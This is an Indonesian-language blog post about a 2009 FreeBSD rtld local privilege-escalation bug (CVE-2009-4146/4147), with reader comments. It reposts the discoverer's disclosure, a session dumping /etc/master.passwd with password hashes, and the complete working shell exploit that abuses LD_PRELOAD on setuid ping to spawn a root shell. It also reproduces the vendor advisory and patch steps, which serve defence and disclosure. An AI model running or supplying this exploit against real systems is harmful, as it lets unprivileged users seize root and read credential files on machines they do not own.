local r00t exploit zeroday pada FreeBSD

Bismillah,

pada kesempatan kali ini saya akan menulis tentang exploit yang ditemukan pada sistim operasi FreeBSD baru-baru ini. Exploit ini adalah exploit lokal yang jika dijalankan akan mengakibatkan user biasa dapat mendapat akses sebagai root pada sistem.

berikut ini adalah laporan adanya local r00t exploit ini di sebuah archive milis http://seclists.org/fulldisclosure/2009/Nov/371

** FreeBSD local r00t 0day
Discovered & Exploited by Nikolaos Rangos also known as Kingcope.
Nov 2009 "BiG TiME"

"Go fetch your FreeBSD r00tkitz" // http://www.youtube.com/watch?v=dDnhthI27Fg

There is an unbelievable simple local r00t bug in recent FreeBSD versions.
I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out.

The bug resides in the Run-Time Link-Editor (rtld).
Normally rtld does not allow dangerous environment variables like LD_PRELOAD
to be set when executing setugid binaries like "ping" or "su".
With a rather simple technique rtld can be tricked into
accepting LD variables even on setugid binaries.
See the attached exploit for details.

Example exploiting session
**********************************
%uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC  i386
uid=1001(kcope) gid=1001(users) groups=1001(users)
%./w00t.sh
FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in
function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in
function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in
function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC  i386
uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users)
# cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29
kensmith Exp $
#
root:$1$AUbbHoOs$CCCsw7hsMB14KBkeS1xlz2:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission
User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP
pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
kcope:$1$u2wMkYLY$CCCuKax6dvYJrl2ZCYXA2:1001:1001::0:0:User
&:/home/kcope:/bin/sh
#

Systems tested/affected
**********************************
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NOT VULN
FreeBSD 4.9-RELEASE *** NOT VULN

*EXPLOIT*

#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF
#include <stdio.h>

main() {
        extern char **environ;
        environ = (char**)malloc(8096);

        environ[0] = (char*)malloc(1024);
        environ[1] = (char*)malloc(1024);
        strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");

        execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
        extern char **environ;
        environ=NULL;
        system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env

versi FreeBSD yang rentan terhadap exploit tersebut antara lain adalah FreeBSD 7 dan FreeBSD 8, sedangkan versi sebelumnya dari sistim operasi ini tidak rentan terhadap exploit ini. Exploit ini memanfaatkan celah keamanan yang ada pada rtld (Run-Time Link-Editor) yang ada pada sistem FreeBSD.

untuk patch dari local r00t exploit tersebut petunjuk dan lokasi mengunduhnya dapat dilihat di http://security.freebsd.org/advisories/FreeBSD-SA-09:16.rtld.asc.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=============================================================================
FreeBSD-SA-09:16.rtld                                       Security Advisory
                                                          The FreeBSD Project

Topic:          Improper environment sanitization in rtld(1)

Category:       core
Module:         rtld
Announced:      2009-12-03
Affects:        FreeBSD 7.0 and later.
Corrected:      2009-12-01 02:59:22 UTC (RELENG_8, 8.0-STABLE)
                2009-12-03 09:18:40 UTC (RELENG_8_0, 8.0-RELEASE-p1)
                2009-12-01 03:00:16 UTC (RELENG_7, 7.2-STABLE)
                2009-12-03 09:18:40 UTC (RELENG_7_2, 7.2-RELEASE-p5)
                2009-12-03 09:18:40 UTC (RELENG_7_1, 7.1-RELEASE-p9)
CVE Name:       CVE-2009-4146, CVE-2009-4147

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:http://security.FreeBSD.org/>.

I.   Background

The run-time link-editor, rtld, links dynamic executable with their
needed libraries at run-time.  It also allows users to explicitly
load libraries via various LD_ environmental variables.

II.  Problem Description

When running setuid programs rtld will normally remove potentially
dangerous environment variables.  Due to recent changes in FreeBSD
environment variable handling code, a corrupt environment may
result in attempts to unset environment variables failing.

III. Impact

An unprivileged user who can execute programs on a system can gain
the privileges of any setuid program which he can run.  On most
systems configurations, this will allow a local attacker to execute
code as the root user.

IV.  Workaround

No workaround is available, but systems without untrusted local users,
where all the untrusted local users are jailed superusers, and/or where
untrusted users cannot execute arbitrary code (e.g., due to use of read
only and noexec mount options) are not affected.

Note that "untrusted local users" include users with the ability to
upload and execute web scripts (CGI, PHP, Python, Perl etc.), as they
may be able to exploit this issue.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to 7-STABLE or 8-STABLE,
or to the RELENG_8_0, RELENG_7_2, or RELENG_7_1 security branch dated
after the correction date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 7.1, 7.2,
and 8.0 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 7.x]
# fetch http://security.FreeBSD.org/patches/SA-09:16/rtld7.patch
# fetch http://security.FreeBSD.org/patches/SA-09:16/rtld7.patch.asc

[FreeBSD 8.0]
# fetch http://security.FreeBSD.org/patches/SA-09:16/rtld.patch
# fetch http://security.FreeBSD.org/patches/SA-09:16/rtld.patch.asc

b) Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/libexec/rtld-elf
# make obj && make depend && make && make install

NOTE: On the amd64 platform, the above procedure will not update the
ld-elf32.so.1 (i386 compatibility) run-time link-editor (rtld).  On
amd64 systems where the i386 rtld are installed, the operating system
should instead be recompiled as described in
<URL:http://www.FreeBSD.org/handbook/makeworld.html>

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

CVS:

Branch                                                           Revision
  Path
- -------------------------------------------------------------------------
RELENG_7
  src/libexec/rtld-elf/rtld.c                                   1.124.2.7
RELENG_7_2
  src/UPDATING                                             1.507.2.23.2.8
  src/sys/conf/newvers.sh                                   1.72.2.11.2.9
  src/libexec/rtld-elf/rtld.c                               1.124.2.4.2.2
RELENG_7_1
  src/UPDATING                                            1.507.2.13.2.12
  src/sys/conf/newvers.sh                                   1.72.2.9.2.13
  src/libexec/rtld-elf/rtld.c                               1.124.2.3.2.2
RELENG_8
  src/libexec/rtld-elf/rtld.c                                   1.139.2.4
RELENG_8_0
  src/UPDATING                                              1.632.2.7.2.4
  src/sys/conf/newvers.sh                                    1.83.2.6.2.4
  src/libexec/rtld-elf/rtld.c                               1.139.2.2.2.2
- -------------------------------------------------------------------------

Subversion:

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/7/                                                         r199981
releng/7.2/                                                       r200054
releng/7.1/                                                       r200054
stable/8/                                                         r199980
releng/8.0/                                                       r200054
- -------------------------------------------------------------------------

VII. References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4146
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4147

The latest revision of this advisory is available at
http://security.FreeBSD.org/advisories/FreeBSD-SA-09:16.rtld.asc
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (FreeBSD)

iEUEARECAAYFAksXg/IACgkQFdaIBMps37KrLwCdH4JsCrvdS1RGoGj7MlNgV3+/
nhYAliVcz9tL8Ll6pYKpIalR740sZ5s=
=jK/a
-----END PGP SIGNATURE-----

walaupun setelah dicoba, mesin yang saya patch masih dapat terkena exploit ini (FreeBSD 7.2-RELEASE). mungkin masih ada langkah-langkah yang belum saya lakukan dalam prosedur patching ini sehingga masih belum dapat bebas dari serangan exploit local ini.

Update: (7 Desember 2009)

untuk melakukan patch cukup gunakan freebsd-update dengan menjalankan perintah sebagai berikut sebagai root:

freebsd-update fetch
freebsd-update install

terima kasih banyak kepada mas arif atas tambahan cara patch untuk exploit ini.

Sekian tulisan kali ini. Semoga bermanfaat.

3 pemikiran pada “local r00t exploit zeroday pada FreeBSD

  1. install patch pake freebsd-update
    freebsd-update fetch
    freebsd-update install
    coba abis itu dijalanin tuh exploit
    pasti dah ga berlaku lagi

    ——
    arif

    1. terima kasih atas tambahannya mas arif atas cara menangani exploit ini…🙂
      kemarin juga baca-baca dan cara patch exploitnya melalui freebsd-update tapi masih belum sempat update artikel ini…
      setelah ini akan saya update…🙂

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s